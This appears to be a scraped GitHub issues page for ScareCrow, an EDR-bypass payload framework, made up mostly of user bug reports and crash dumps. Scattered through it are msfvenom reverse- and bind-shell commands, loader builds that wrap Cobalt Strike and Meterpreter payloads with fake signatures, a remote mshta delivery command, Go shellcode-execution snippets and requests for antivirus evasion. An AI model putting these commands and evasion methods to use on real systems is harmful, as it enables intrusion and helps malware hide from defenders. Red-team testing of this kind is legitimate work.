optiv / scarecrow Goto Github PK
View Code? Open in Web Editor NEWScareCrow - Payload creation framework designed around EDR bypass.
ScareCrow - Payload creation framework designed around EDR bypass.
Are you aware of the below?
https://github.com/mgeeky/ShellcodeFluctuation
It would be worth implementing into ScareCrow
ScareCrow_3.0_windows_amd64.exe -I c.bin -Loader binary -domain www.microsoft.com
After creating in Mythic shellcode using Atlas agent, try to generate wrapper to it using scarecrow wrapper
getting this:
No payloads that can be included have been created yet.
What iam doing wrong
I followed the installation instructions and am running into issues where it thinks I am missing things. See below. Any advice?
[*] Encrypting Shellcode Using AES Encryption
[+] Shellcode Encrypted
panic: open Word/Word.go: no such file or directory
[*] Encrypting Shellcode Using AES Encryption
[+] Shellcode Encrypted
panic: open lync/lync.go: no such file or directory
[*] Encrypting Shellcode Using AES Encryption
[+] Shellcode Encrypted
panic: open Outlook/Outlook.go: no such file or directory
When I create a binary (on kali):
./ScareCrow -I shellcode_x64.bin -Loader binary -domain google.com
and execute the binary on windows, I receive an exception:
`[DEBUG] [+] Detected Version: 10.0
[DEBUG] [+] Reloading: C:\Windows\System32\kernel32.dll
[DEBUG] [+] Reloading: C:\Windows\System32\kernelbase.dll
[DEBUG] [+] Reloading: C:\Windows\System32\ntdll.dll
[DEBUG] [+] EDR removed
[DEBUG] [] Create a Pointer on stack
[DEBUG] [] Loading shellcode into a string
[DEBUG] [] Copy Pointer's attributes
[DEBUG] [] Overwriten Pointer to point to shellcode String
Exception 0xc0000005 0x0 0x1724fbb3000 0xc000090000
PC=0xc000090000
syscall.Syscall(0xc000090000, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0)
runtime/syscall_windows.go:188 +0xe9
main.main()
loader/OneDrive.go:202 +0x665
rax 0xc000090000
rbx 0xcdf920
rcx 0x0
rdi 0xb24fb23000
rsi 0xc000079e40
rbp 0xc000079de0
rsp 0xb24fdffd18
r8 0x0
r9 0x0
r10 0x0
r11 0x206
r12 0xffffffffffffffff
r13 0x2e
r14 0x2d
r15 0xaa
rip 0xc000090000
rflags 0x10297
cs 0x33
fs 0x53
gs 0x2b`
I would like to thank you for providing such an complete framework and the research details at first!
Unfortunately, I was not able to create valid payloads with ScareCrow so far.
As an example, I tried the shellcode creation via msfvenom first:
msfvenom -p windows/x64/shell/bind_tcp LPORT=8888 -f raw -o ./Desktop/scarecrow-test/bind.bin -b '\x00'
or
msfvenom -p windows/x64/shell/bind_tcp LPORT=8888 EXITFUNC=thread -f raw -o ./Desktop/scarecrow-test/bind.bin -b '\x00'
Then I tried to use ScareCrow on it:
./ScareCrow -I ../bind.bin -Loader binary -domain microsoft.com -console
which succeeds in creating a binary loader. But the resulting exe is not working on an Windows box. The resulting debug output in console is:
[DEBUG] [+] Detected Version: 10.0
[DEBUG] [+] Reloading: C:\Windows\System32\kernel32.dll
[DEBUG] [+] Reloading: C:\Windows\System32\kernelbase.dll
[DEBUG] [+] Reloading: C:\Windows\System32\ntdll.dll
[DEBUG] [+] EDR removed
[DEBUG] [*] Create a Pointer on stack
[DEBUG] [*] Loading shellcode into a string
[DEBUG] [*] Copy Pointer's attributes
[DEBUG] [*] Overwriten Pointer to point to shellcode String
Exception 0xc0000005 0x0 0xda29d2b000 0xc000128000
PC=0xc000128000
runtime: unknown pc 0xc000128000
stack: frame={sp:0xc000119e30, fp:0x0} stack=[0xc000112000,0xc00011a000)
000000c000119d30: 0000000000000001 000000c000119d60
000000c000119d40: 000000000066bb98 <fmt.(*pp).free+184> 0100000000777000
000000c000119d50: 000001e7e9b993b0 0000000000000000
000000c000119d60: 0000000000000028 000001e7e9b907b0
000000c000119d70: 000000c00000aae0 000000c000082120
000000c000119d80: 000000000077f660 0000000000000000
000000c000119d90: 0000000000000000 00000000006e5280
000000c000119da0: ffffffffffffffff 000000c000094500
000000c000119db0: 000000c000119ed8 0000000000000040
000000c000119dc0: 000000c000119e90 000000000069f180
000000c000119dd0: 000000000068e401 <main.printDebug+33> 000000c00000aae0
000000c000119de0: 0000000000000050 000000000068f7ce <main.NtProtectVirtualMemory+142>
000000c000119df0: 0000000000690050 000000c00000aae0
000000c000119e00: 0000000000000005 0000000000000005
000000c000119e10: 0000000000000000 0000000000000000
000000c000119e20: 000000c0000fcde0 000000c000119f78
000000c000119e30: <000000000068f2d9 <main.main+1593> 00000000006c0050
000000c000119e40: ffffffffffffffff 000000c000094500
000000c000119e50: 000000c000119ed8 0000000000000040
000000c000119e60: 000000c000119e90 0000000000000000
000000c000119e70: 0000000000000000 000000c0000fcde0
000000c000119e80: 0000000000000002 0000000000000400
000000c000119e90: 0000000000000004 0000000000000540
000000c000119ea0: 0000000000000010 0000000000000012
000000c000119eb0: 0000000000000540 00000000000003e6
000000c000119ec0: 00000000006e5c20 0000000000000020
000000c000119ed0: 0000000000000021 0000000000002000
000000c000119ee0: 000000c0000fc990 000000c0000c5f18
000000c000119ef0: 000000000068e2ee <golang.org/x/sys/windows/registry.init+686> 000000c0000fc810
000000c000119f00: 00000000006c2647 0000000000000019
000000c000119f10: 000000c0000fc990 000000c0000c5f48
000000c000119f20: 000000c000094500 000000c000128800
runtime: unknown pc 0xc000128000
stack: frame={sp:0xc000119e30, fp:0x0} stack=[0xc000112000,0xc00011a000)
000000c000119d30: 0000000000000001 000000c000119d60
000000c000119d40: 000000000066bb98 <fmt.(*pp).free+184> 0100000000777000
000000c000119d50: 000001e7e9b993b0 0000000000000000
000000c000119d60: 0000000000000028 000001e7e9b907b0
000000c000119d70: 000000c00000aae0 000000c000082120
000000c000119d80: 000000000077f660 0000000000000000
000000c000119d90: 0000000000000000 00000000006e5280
000000c000119da0: ffffffffffffffff 000000c000094500
000000c000119db0: 000000c000119ed8 0000000000000040
000000c000119dc0: 000000c000119e90 000000000069f180
000000c000119dd0: 000000000068e401 <main.printDebug+33> 000000c00000aae0
000000c000119de0: 0000000000000050 000000000068f7ce <main.NtProtectVirtualMemory+142>
000000c000119df0: 0000000000690050 000000c00000aae0
000000c000119e00: 0000000000000005 0000000000000005
000000c000119e10: 0000000000000000 0000000000000000
000000c000119e20: 000000c0000fcde0 000000c000119f78
000000c000119e30: <000000000068f2d9 <main.main+1593> 00000000006c0050
000000c000119e40: ffffffffffffffff 000000c000094500
000000c000119e50: 000000c000119ed8 0000000000000040
000000c000119e60: 000000c000119e90 0000000000000000
000000c000119e70: 0000000000000000 000000c0000fcde0
000000c000119e80: 0000000000000002 0000000000000400
000000c000119e90: 0000000000000004 0000000000000540
000000c000119ea0: 0000000000000010 0000000000000012
000000c000119eb0: 0000000000000540 00000000000003e6
000000c000119ec0: 00000000006e5c20 0000000000000020
000000c000119ed0: 0000000000000021 0000000000002000
000000c000119ee0: 000000c0000fc990 000000c0000c5f18
000000c000119ef0: 000000000068e2ee <golang.org/x/sys/windows/registry.init+686> 000000c0000fc810
000000c000119f00: 00000000006c2647 0000000000000019
000000c000119f10: 000000c0000fc990 000000c0000c5f48
000000c000119f20: 000000c000094500 000000c000128800
rax 0xc000128000
rbx 0x0
rcx 0xc0000fcde0
rdi 0x1a29c03000
rsi 0xc000119da0
rbp 0xc000119f78
rsp 0xc000119e30
r8 0xc000119d98
r9 0xc000119e28
r10 0x0
r11 0x212
r12 0xffffffffffffffff
r13 0x3b
r14 0x3a
r15 0xaa
rip 0xc000128000
rflags 0x10246
cs 0x33
fs 0x53
gs 0x2b
I also tried to use Donut to create a x64 shellcode of an existing binary, as well as using dll as a Loader for ScareCrow for both generated shellcodes (msf and donut). Nothing worked so far for me.
Can you please give me more details on what kind of shellcode payload ScareCrow expects?
Maybe provide some examples in the documentation?
Many thanks
Hey man great work!
I would like to ask for a feature request when you find time and you want it as well :)
Feature: To add an output parameter that specifies the location of the final Payload/Loader on where it is going to be saved.
For example:
./ScareCrow ...... --output /home/user/Desktop/
(The user wants the final payload to be saved at the Desktop)
Thanks in advance,
Keep up the great work!
Tried as well with disabling amsi,etw and sleep.
Encrypted shellcode method does not bypass antiviruses.
When executing the HTA delivery file (for both control and excel loaders) passing a remote URL where the HTA file is hosted does nothing. On the other hand, if the HTA file is already located on disk, the shellcode is executed successfully.
Monitoring through Process Explorer for control, you can see that control.exe is spawned which then calls rundll32.exe. This never happens when a remote URL is passed instead.
HTA file generated via:
/opt/ScareCrow/ScareCrow -I raw_shell.bin -Loader control -O loader.hta -delivery hta -url <url> -domain <domain>
OR
/opt/ScareCrow/ScareCrow -I raw_shell.bin -Loader excel -O loader.hta -delivery hta -url <url> -domain <domain>
Control/Excel Loader executed via:
mshta.exe http://HOST/loader.hta
--> does not work
mshta.exe C:\Windows\Tasks\loader.hta
--> works
It'd be nice if there was a service binary option when building a payload that we can use with services.
Hello,
If I choose the delivery options (hta), the executable was generated, but the hta file and the one liner command (output?) is missing.
What am I missed?
Thanks!
Whenever i try to generate a binary it fails. I peaked at the code and saw that it fails at the point where the certificate is generated. I have tried it on an up to date kali linux and on a Debian 9 server.
The payload is generated with:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.0.197 LPORT=51251 -f raw > bin.raw
Tried multiple argument permutations.
Error:
└─$ /opt/ScareCrow/ScareCrow -I /home/kali/Desktop/bin.raw -domain axano.com -Loader binary -delivery macro -url http://192.168.0.197/
_________ _________
/ _____/ ____ _____ _______ ____ \_ ___ \_______ ______ _ __
\_____ \_/ ___\\__ \\_ __ \_/ __ \/ \ \/\_ __ \/ _ \ \/ \/ /
/ \ \___ / __ \| | \/\ ___/\ \____| | \( <_> ) /
/_______ /\___ >____ /__| \___ >\______ /|__| \____/ \/\_/
\/ \/ \/ \/ \/
(@Tyl0us)
“Fear, you must understand is more than a mere obstacle.
Fear is a TEACHER. the first one you ever had.”
[*] Encrypting Shellcode Using AES Encryption
[+] Shellcode Encrypted
[*] Creating an Embedded Resource File
[+] Created Embedded Resource File With cmd's Properties
[*] Compiling Payload
[+] Payload Compiled
[*] Signing cmd.exe With a Fake Cert
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x18 pc=0x6df56a]
goroutine 1 [running]:
ScareCrow/limelighter.GenerateCert(0x7ffe784ad450, 0x9)
/opt/ScareCrow/limelighter/limelighter.go:56 +0x2ca
ScareCrow/limelighter.Signer(0x7ffe784ad450, 0x9, 0x0, 0x0, 0x0, 0x0, 0xc000448720, 0x7)
/opt/ScareCrow/limelighter/limelighter.go:1040 +0x4c6
main.execute(0xc0000fa000, 0x76f099, 0x3)
/opt/ScareCrow/ScareCrow.go:83 +0x63b
main.main()
/opt/ScareCrow/ScareCrow.go:162 +0x906
Hi, thanks for this awesome tool!
fixed thanks.
when run makes random files onenote onedrive excel word, but never creates out file.
go build ScareCrow.go
/home/virginhybrid78/Downloads/ScareCrow-main/Struct/Struct.go:213: error: invalid export data for ‘Macro’: invalid line number
/home/virginhybrid78/Downloads/ScareCrow-main/Struct/Struct.go:212: error: invalid export data for ‘Macro’: invalid line number
Hi,
I generated shellcode for messagebox and used the loader binary to convert to exe with scarecrow.
successfully generated but it's not prompting for messagebox. seems there is an issue with binary loader.
exec: "": executable file not found in %PATH%:
[+] Payload Compiled
[*] Signing mimosys.dll With a Fake Cert
2022/04/15 12:46:03 cmd.Run() failed with exit status 0xffffffff
I have downloaded osslsigncode and put it on path env to sign and i i'll give this error
not work on windows 10
Binary and dll payloads are not working with Covenant (that uses donut to generate shellcode).
The control .cpl payload works but it is flagged by 6 AVs, I was modifying the code base for ages tying to find the signatures, but it's a large code base.
Any ideas which bits of the code they are flagging? I noticed that random names are generated for every function and variable name in the Cryptor.
I tried running the dll payload with: rundll32 example.dll
Hello,
thank you for providing such a great framework! Amazing work.
Unfortunately, the DLL Refresher code is detected by some AV, for example: NOD32. Example command:
../ScareCrow/ScareCrow -I beacon-sourcepoint-test1.bin -Loader dll -etw -domain www.microsoft.com
When I disabled refreshing and ETW, the DLL bypasses NOD32 though. I tried modifying the Struct.go, but editing is pretty hard due to "variable set and unused" compilation error.
Any chance that you can implement ETW and Refresher functionality as reflected (encrypted) DLL files? My Goland skills cannot do that in this language :(
thanks
Rafal
Hi again,
as I played around with this great tool a little more, I found I could not get the Excel loader module to work.
I tried to create shellcode in two ways:
msfvenom -p windows/x64/shell_bind_tcp LPORT=8888 -o msf.bin -f raw
msfvenom -p windows/x64/meterpreter_bind_tcp LPORT=8888 -o msf.bin -f raw
Both worked flawlessly with other loaders (except the binary one).
When I create the payload via Excel loader module, I try to execute it via cscript as I saw a JavaScript file gets created.
Excel spawns with a unsafe file extension message but does not execute the resulting xll.
I saw the xll got created in AppData\temp so I copied it before closing Excel and tried to execute the DLL manually by the methods described in this gist:
https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52
Unfortunately none of them worked.
Windows version here is
Version 20H2 (OS Build 19042.746)
Excel version is:
Office Professional Plus 2019
Version 2102
No AVs are installed and Defender is turned off completely for testing here.
Input:
./ScareCrow -I /root/tools/b64.bin -Loader wscript -O loader.hta -domain microsoft.com
Thoughts:
Tested 3 times. File output only appears to show code from Structs.go JSfile() the code from HTA() does not appear in file. I could be using it wrong or something but I think the expected output would be using some of the HTA() code (at least for the html). Might help solve issue #19.
Interesting Output found during testing (file extension left blank):
`C:\Users\Admin\Desktop>test.exe
[DEBUG] [+] Detected Version: 10.0
[DEBUG] [+] Reloading: C:\Windows\System32\kernel32.dll
[DEBUG] [+] Reloading: C:\Windows\System32\kernelbase.dll
[DEBUG] [+] Reloading: C:\Windows\System32\ntdll.dll
[DEBUG] [+] EDR removed
[DEBUG] [] Create a Pointer on stack
[DEBUG] [] Loading shellcode into a string
[DEBUG] [] Copy Pointer's attributes
[DEBUG] [] Overwriten Pointer to point to shellcode String
Exception 0xc0000005 0x0 0xffffffffffffffff 0x7ffcdc61d34d
PC=0x7ffcdc61d34d
runtime: unknown pc 0x7ffcdc61d34d
stack: frame={sp:0xc00006d2a8, fp:0x0} stack=[0xc00006c000,0xc00006e000)
000000c00006d1a8: 0000000000000200 0000000000000008
000000c00006d1b8: 0000000000000000 0000000000000110
000000c00006d1c8: 0000000000000100 0000000000000002
000000c00006d1d8: 0000000000a30000 000000c00006d2a1
000000c00006d1e8: 0000000000000011 00007ffcef6fb434
000000c00006d1f8: 0000000000140000 0000000000000000
000000c00006d208: 00007ffcdc687420 0000000000000002
000000c00006d218: 0000000000000001 0000000000a3e4d0
000000c00006d228: 0000000000000002 00007ffcef6cabec
000000c00006d238: 000000c000000000 0000000000000000
000000c00006d248: 0000000000000000 0000000000a3e490
000000c00006d258: 000000c00006d300 00007ffcef6caa97
000000c00006d268: 0000000000a3e490 00007ffcef713c70
000000c00006d278: 0000000000a3e490 0000001700000002
000000c00006d288: 000000000000018c 00007ffcdc687420
000000c00006d298: 000000a000000000 0000000000000000
000000c00006d2a8: <0000af6126a8b566 0000000000000000
000000c00006d2b8: 0000000000000000 00007ffcec65eced
000000c00006d2c8: 00000000000003f0 0000000000000000
000000c00006d2d8: 00007ffcdc687420 00007ffcef826448
000000c00006d2e8: 0000000000000000 00007ffcec65ec4b
000000c00006d2f8: 0000000000a3e490 0000af6126a8b576
000000c00006d308: 00007ffcdc687420 00007ffcdc5d7c01
000000c00006d318: 0000000000000190 000000000000001d
000000c00006d328: 000000c00006d360 0000000000000004
000000c00006d338: 000000c00006d368 0000000000000000
000000c00006d348: 000000c00006d3d8 00007ffcdc5adbd0
000000c00006d358: 0000000000000000 0000000000000000
000000c00006d368: 0000000000000000 00000000ef6ca3bf
000000c00006d378: 0000000000000000 0000000000000000
000000c00006d388: 000000c00006d3e1 00007ffcdc6118c1
000000c00006d398: 0000000000000000 0000000000000190
runtime: unknown pc 0x7ffcdc61d34d
stack: frame={sp:0xc00006d2a8, fp:0x0} stack=[0xc00006c000,0xc00006e000)
000000c00006d1a8: 0000000000000200 0000000000000008
000000c00006d1b8: 0000000000000000 0000000000000110
000000c00006d1c8: 0000000000000100 0000000000000002
000000c00006d1d8: 0000000000a30000 000000c00006d2a1
000000c00006d1e8: 0000000000000011 00007ffcef6fb434
000000c00006d1f8: 0000000000140000 0000000000000000
000000c00006d208: 00007ffcdc687420 0000000000000002
000000c00006d218: 0000000000000001 0000000000a3e4d0
000000c00006d228: 0000000000000002 00007ffcef6cabec
000000c00006d238: 000000c000000000 0000000000000000
000000c00006d248: 0000000000000000 0000000000a3e490
000000c00006d258: 000000c00006d300 00007ffcef6caa97
000000c00006d268: 0000000000a3e490 00007ffcef713c70
000000c00006d278: 0000000000a3e490 0000001700000002
000000c00006d288: 000000000000018c 00007ffcdc687420
000000c00006d298: 000000a000000000 0000000000000000
000000c00006d2a8: <0000af6126a8b566 0000000000000000
000000c00006d2b8: 0000000000000000 00007ffcec65eced
000000c00006d2c8: 00000000000003f0 0000000000000000
000000c00006d2d8: 00007ffcdc687420 00007ffcef826448
000000c00006d2e8: 0000000000000000 00007ffcec65ec4b
000000c00006d2f8: 0000000000a3e490 0000af6126a8b576
000000c00006d308: 00007ffcdc687420 00007ffcdc5d7c01
000000c00006d318: 0000000000000190 000000000000001d
000000c00006d328: 000000c00006d360 0000000000000004
000000c00006d338: 000000c00006d368 0000000000000000
000000c00006d348: 000000c00006d3d8 00007ffcdc5adbd0
000000c00006d358: 0000000000000000 0000000000000000
000000c00006d368: 0000000000000000 00000000ef6ca3bf
000000c00006d378: 0000000000000000 0000000000000000
000000c00006d388: 000000c00006d3e1 00007ffcdc6118c1
000000c00006d398: 0000000000000000 0000000000000190
rax 0x7ffcdca04800
rbx 0x0
rcx 0x190
rdi 0xc00006d398
rsi 0x0
rbp 0xc00006d388
rsp 0xc00006d2a8
r8 0xc00006d360
r9 0x4
r10 0x0
r11 0x246
r12 0x7ffcdc9bb558
r13 0x1
r14 0x1
r15 0x0
rip 0x7ffcdc61d34d
rflags 0x10212
cs 0x33
fs 0x53
gs 0x2b`
Hi,
Is it possible that the different Loaders and Delivery options don't work? I installed the dependencies and everything on Kali Linux and generated raw shellcode with msfvenom. The process of building a binary o dll finishes without errors but they never execute the payload. I'm using a windows x64 reverse shell generated with this command:
msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 --platform windows -f raw -o shellcode.bin LHOST=192.168.0.49 LPORT=443
the command executed to build the binary is:
./ScareCrow -I /root/Desktop/tests/payloads/shellcode.bin -delivery bits -domain www.microsoft.com
The delivery options do not generate the code to download and execute the payload, like the macros one.
The only option that actually worked and executed the reverse shell was the Control Panel applet. Nothing else works.
Also, when I examine the Digital Signature of the generated binary or dll or applet it says that it cannot be verified, unlike the screenshot you provided in the Readme file.
My go version is 1.15.3
Any ideas as to what might be wrong? Do I need to start from zero?
Thank you!
Hi. Thank you for your great work! I am trying to get a Cobalt Strike beacon.exe thru Windows Defender but currently I get the two errors below. I attempt this on Kali 2021.3 in a virtual environment using version 2.3 of ScareCrow.
┌──(virtual_env_scarecrow)─(root💀kali)-[~/pentest/ScareCrow-2.3]
└─# ./ScareCrow -I beacon.exe -domain www.microsoft.com -injection "C:\Windows\System32\notepad.exe" -console
[] Encrypting Shellcode Using AES Encryption
[+] Shellcode Encrypted
[+] Process Injection Mode Enabled
[] Created Process: C:\Windows\System32\notepad.exe
[] Creating an Embedded Resource File
[+] Created Embedded Resource File With OneDrive's Properties
[] Compiling Payload
exit status 2: # loader
./OneDrive.go:367:67: newline in string
./OneDrive.go:367:67: syntax error: unexpected newline, expecting comma or )
./OneDrive.go:2682:3: newline in string
[+] Payload Compiled
[*] Signing OneDrive.exe With a Fake Cert
2021/09/22 04:06:42 cmd.Run() failed with exit status 255
For some reason macro fails! After generating loader and js file from msfvenom.bin shellcode
./ScareCrow -I msfvenom.bin -Loader excel
-domain some.tld -url http://some.com -sandbox -O file.js
Host file in server provided in payload, copy macro from ScareCrow adding it to Office 2013
Developper Macro! (As from shellcode it works when I execute cscript file.js i get shell access)
From proccess hacker i can actually see Exel contact server URL i provided, but no reverse shell created! Tried with excel and msiexec and wscript Loader, so I am assuming that i have made mistske somewhere!
can you please post the command to generate a macro?
i have tried ./Scarecrow -I my.bin -Loader excel -domain www.youtube.com -url https://file.io
should I add the binary name after file.io?
thx for advance
Payload is detected by defender as malicious and deleted
I created stageless meterpreter with msfvenom, then packed it as exe file with scarecrow, and windows defender is catching my exe file. Am I doing something wrong, or is ScareCrow already out of date?
Kind regards, Zahar
Hello!
I'm finding that Windows Defender is gobbling each and every payload I throw from ScareCrow at it, and it feels like I'm doing something wrong. Hope you could sanity check my process? Fair warning: I'm not new to pentesting but new to Cobalt Strike and not very experienced with EDR bypass techniques. In fact, seeing this video on ScareCrow is what inspired me to finally buy Cobalt Strike!
Anyways, I start in Cobalt Strike:
Attacks > Packages > Payload Generator > picked my listener > chose output of "raw" > ticked the box for "Use x64 payload" > saved that to ScareCrow folder on Kali VM. I also tried Attacks > Packages > Windows Executable (S) to get the export as well.
From Kali VM, tried generating a variety of payloads from Scarecrow. They generate successfully with no errors.
From my Win 10 19041 box, tried firing the payloads in several ways (drag and drop directly to disk, fire with msbuild, fire with PowerShell, fire with rundll32, etc.) and Windows Defender happily gobbles them up.
I thought maybe it was just Defender getting wise to some of ScareCrow's shenanigans, but it looks like folks have no problem fooling Defender - at least as of this very recent blog post that I saw someone tweet.
Any ideas?
Thanks!
Brian
Hello all please when i use ssm run command i get the results as failed with this screen.
Failed to run command : exit status 0xffffffff
Hello,
During testing of C2 frameworks and scarecrow I ran across interesting behavior when it came to the Mythic C2 atlas agent (https://github.com/MythicAgents/atlas)
When exporting an atlas agent executable, using donut to generate shellcode and then using scarecrow the new wrapped payload is successfully created. When executed this payload makes 1 callback to the C2 server and then ceases to run. I have tried a number of different combinations to attempt to understand the issue better:
atlas + confuserEx + donut + scarecrow = 1 callback then dead
atlas + donut + scarecrow = 1 callback then dead
atlas + CLRvoyance + scarecrow = 1 callback then dead
atlas + confuserEx + donut + DonutTest = working implant
in addition I tried another dotnet c2 framework
Covenant Grunt + confuserEx + donut + scarecrow = working implant.
I have tried binary and control loaders and I have used the console and no errors are generated at any point. I'm happy to try and other troubleshooting that anyone might recommend.
Thanks
Windows defender have a new sandbox now, not executing any script on the system
Hello :)
Which EDR were you able to bypass ?
Best,
L
Thank you for the code and latest update, however, I could not generate exe on latest 4.0.
Raw payload generated by lastest CS
sudo ./ScareCrow -I ~/Downloads/beacon.bin -Loader control -domain www.microsoft.com -O test.exe
will gave me the following error message:
[*] Compiling Payload
exit status 1: go list error: exit status 1: inputs.go:8:1: expected 'STRING', found '<<'
[+] Payload Compiled
Each time run the command will pop a different file name, but same location, for example:
exit status 1: go list error: exit status 1: winsec.go:8:1: expected 'STRING', found '<<'
exit status 1: go list error: exit status 1: netfirewall.go:8:1: expected 'STRING', found '<<'
Thanks!!
hello, running this tool in a windows 10 box , with all the tools required, installed and setup them on the PATH variable of the system i get this error:
ccc is the raw generated payload with msfvenom
C:\temp\ScareCrow>ScareCrow.exe -I c:\temp\ccc -domain microsoft.com
/ / ____ _____ _______ ____ _ ___ __ ______ _ __
_____ _/ \ \ __ _/ __ / \ /_ __ / _ \ / / /
/ \ ___ / __ | | /\ /\ _| | ( <> ) /
/______ /___ >____ /| _ >______ /|| __/ /_/
/ / / / /
(@Tyl0us)
“Fear, you must understand is more than a mere obstacle.
Fear is a TEACHER. the first one you ever had.”
[] Encrypting Shellcode Using AES Encryption
[+] Shellcode Encrypted
[] Creating an Embedded Resource File
[+] Created Embedded Resource File With Outlook's Properties
[] Compiling Payload
exec: "": executable file not found in %PATH%:
[+] Payload Compiled
[] Signing Outlook.exe With a Fake Cert
2021/02/15 16:29:44 cmd.Run() failed with exit status 4294967295
i cannot figured out which executable is not on the PATH.. anything i do wrong ? all the single tool is working and its on the PATH:
thanks
how i can optimize encryption to stay out from detection?
OS is Kali Linux 2021.2. Go version is go version go1.15.15 linux/amd64.
I'm using a Cobalt Strike payload generated using Attacks -> Packages -> Windows Executable (S), Raw, and checked x64.
I enter the command:
./ScareCrow -I payload.bin -Loader wscript -etw --url http://[redacted] -domain support.microsoft.com -delivery bits
I get the error:
2021/09/23 11:10:01 [-] Invalid PKCS7 Data (Empty or Not Padded)
I've tried different options and different domains and always get the same error. I also tried git pull origin main
and ran through the documented installation steps and still get the same error.
Thanks
Unable to find a resolution for this one. Any time I attempt to run using anything other than the default, it am presented an error from go I believe, relating to a previous declaration::
[*] Compiling Payload exit status 1: go list error: exit status 2: # igYzBjFwiyh ./tcpmon.go:10:3: base64 redeclared as imported package name /home/user/tools/ScareCrow/tcpmon/tcpmon.go:8:3: previous declaration
I didn't see this anywhere else, could it be a golang issue with the new version or something related to my current setup?
Thanks! And thank you for your work, it's fantastic.
when I after step : [*] Signing Outlook.exe With a Fake Cert, then I got cmd.Run() failed with exit status 0xffffffff.
my env:
go version go1.17.1 windows/amd64
OpenSSL 3.0.0 7 sep 2021 (Library: OpenSSL 3.0.0 7 sep 2021)
osslsigncode 2.2, using:
OpenSSL 1.1.1k 25 Mar 2021 (Library: OpenSSL 1.1.1k 25 Mar 2021)
libcurl/7.78.0 OpenSSL/1.1.1k zlib/1.2.11
hi, there are some codes I can't understand for this shellcode loader:
scarecrow execute shellcode like this way:
targetPtr := func(){
}
size := uintptr(len(shellcode))
var old uint32
windows.VirtualProtect(uintptr(unsafe.Pointer(&targetPtr)),size,windows.PAGE_EXECUTE_READWRITE,&old)
*(**uintptr)(unsafe.Pointer(&targetPtr)) = (*uintptr)(unsafe.Pointer(&shellcode))
var old1 uint32
windows.VirtualProtect(uintptr(unsafe.Pointer(&shellcode[0])),size,windows.PAGE_EXECUTE_READWRITE,&old1)
syscall.Syscall(uintptr(unsafe.Pointer(&shellcode[0])), 0, 0, 0, 0)
but I tried that the other way is work too and have less code:
size := uintptr(len(shellcode))
var old uint32
windows.VirtualProtect(uintptr(unsafe.Pointer(&shellcode[0])),size,windows.PAGE_EXECUTE_READWRITE,&old)
syscall.Syscall(uintptr(unsafe.Pointer(&shellcode[0])), 0, 0, 0, 0)
and another way is worked but unreliable:
targetPtr := func(){
}
size := uintptr(len(shellcode))
var old uint32
windows.VirtualProtect(uintptr(unsafe.Pointer(&targetPtr)),size,windows.PAGE_EXECUTE_READWRITE,&old)
*(**uintptr)(unsafe.Pointer(&targetPtr)) = (*uintptr)(unsafe.Pointer(&shellcode))
var old1 uint32
windows.VirtualProtect(uintptr(unsafe.Pointer(&shellcode[0])),size,windows.PAGE_EXECUTE_READWRITE,&old1)
targetPtr()
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x18 pc=0x6b7193]
goroutine 1 [running]:
ScareCrow/limelighter.GenerateCert(0x7ffee0ffe6d3, 0x8)
/home/jean/Documents/Tools/ScareCrow/limelighter/limelighter.go:49 +0x133
ScareCrow/limelighter.Signer(0x7ffee0ffe6d3, 0x8, 0x0, 0x0, 0x0, 0x0, 0xc000309100, 0x8)
/home/jean/Documents/Tools/ScareCrow/limelighter/limelighter.go:1015 +0x5de
main.execute(0xc000012120, 0x73f3a9, 0x4)
/home/jean/Documents/Tools/ScareCrow/ScareCrow.go:83 +0x63b
main.main()
/home/jean/Documents/Tools/ScareCrow/ScareCrow.go:162 +0x90c
The first error seems to be an access denied (0xc0000005)
./ScareCrow -I ~/Desktop/Payloads/payload.bin -console -domain www.microsoft.com
Example one
OneDrive.exe
[DEBUG] [+] Detected Version: 10.0
[DEBUG] [+] Reloading: C:\Windows\System32\kernel32.dll
[DEBUG] [+] Reloading: C:\Windows\System32\kernelbase.dll
[DEBUG] [+] Reloading: C:\Windows\System32\ntdll.dll
[DEBUG] [+] EDR removed
[DEBUG] [] Create a Pointer on stack
[DEBUG] [] Loading shellcode into a string
[DEBUG] [] Copy Pointer's attributes
[DEBUG] [] Overwriten Pointer to point to shellcode String
Exception 0xc0000005 0x0 0x1af93eea000 0xc00009c000
PC=0xc00009c000
syscall.Syscall(0xc00009c000, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0)
runtime/syscall_windows.go:188 +0xe9
main.main()
loader/OneDrive.go:202 +0x665
rax 0xc00009c000
rbx 0x10b0920
rcx 0x0
rdi 0xef93e4e000
rsi 0xc00010fe40
rbp 0xc00010fde0
rsp 0xef941ffb88
r8 0x0
r9 0x0
r10 0x0
r11 0x206
r12 0xffffffffffffffff
r13 0x3e
r14 0x3d
r15 0xaa
rip 0xc00009c000
rflags 0x10297
cs 0x33
fs 0x53
gs 0x2b
Example two - ran as administrator to see if the problem went away
cmd
[DEBUG] [+] Detected Version: 10.0
[DEBUG] [+] Reloading: C:\Windows\System32\kernel32.dll
[DEBUG] [+] Reloading: C:\Windows\System32\kernelbase.dll
[DEBUG] [+] Reloading: C:\Windows\System32\ntdll.dll
[DEBUG] [+] EDR removed
[DEBUG] [] Create a Pointer on stack
[DEBUG] [] Loading shellcode into a string
[DEBUG] [] Copy Pointer's attributes
[DEBUG] [] Overwriten Pointer to point to shellcode String
Exception 0xc0000005 0x0 0x196c2d26000 0xc000068000
PC=0xc000068000
syscall.Syscall(0xc000068000, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0)
runtime/syscall_windows.go:188 +0xe9
main.main()
loader/cmd.go:202 +0x658
rax 0xc000068000
rbx 0xf40920
rcx 0x0
rdi 0xd6c2cbe000
rsi 0xc0000c9e40
rbp 0xc0000c9de0
rsp 0xd6c2fff7e8
r8 0x0
r9 0x0
r10 0x0
r11 0x206
r12 0xffffffffffffffff
r13 0x3d
r14 0x3c
r15 0xaa
rip 0xc000068000
rflags 0x10297
cs 0x33
fs 0x53
gs 0x2b
This appears to have been raised in #7 but I am using the latest version (I believe - I don't see a version number in the output) cloned today (18/03)
Attempting to generate a macro payload but I am running into an error:
